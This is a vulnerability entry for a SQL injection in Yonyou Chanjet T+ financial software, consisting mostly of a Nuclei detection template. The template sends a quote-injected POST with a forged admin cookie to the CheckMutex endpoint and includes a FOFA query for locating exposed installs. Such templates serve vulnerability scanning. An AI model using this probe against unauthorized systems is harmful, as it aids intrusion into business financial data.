漏洞描述
There is an SQL injection vulnerability in the Changjetcrm financial crm system under Yonyou.
chanjet-tplus-checkmutex-sqli: Chanjet Tplus CheckMutex - SQL Injection
PoC代码[已公开]
id: chanjet-tplus-checkmutex-sqli
info:
name: Chanjet Tplus CheckMutex - SQL Injection
author: unknown
severity: high
description: |
There is an SQL injection vulnerability in the Changjetcrm financial crm system under Yonyou.
reference:
- https://github.com/MrWQ/vulnerability-paper/blob/7551f7584bd35039028b1d9473a00201ed18e6b2/bugs/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E3%80%91%E7%94%A8%E5%8F%8B%E7%95%85%E6%8D%B7%E9%80%9A%20T%2B%20SQL%20%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
metadata:
verified: true
max-request: 1
fofa-query: app="畅捷通-TPlus"
tags: chanjet,tplus,sqli,vuln
http:
- raw:
- |
POST /tplus/ajaxpro/Ufida.T.SM.UIP.MultiCompanyController,Ufida.T.SM.UIP.ashx?method=CheckMutex HTTP/1.1
Host: {{Hostname}}
Content-Type: text/plain
Cookie: ASP.NET_SessionId=; sid=admin
{"accNum": "6'", "functionTag": "SYS0104", "url": ""}
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'order by begintime'
- '"value":'
condition: and
- type: word
part: header
words:
- "text/plain"
- type: status
status:
- 200
# digest: 4a0a0047304502202f6d6700a2a69e52575c550e767442c66b219e3cab61153a0b24c4b5f5e55cb002210087ad950fb6c587d0ea0327529a5ff759b70973fb4d3c3832116914838e165d28:922c64590222798bb761d5b6d8e72950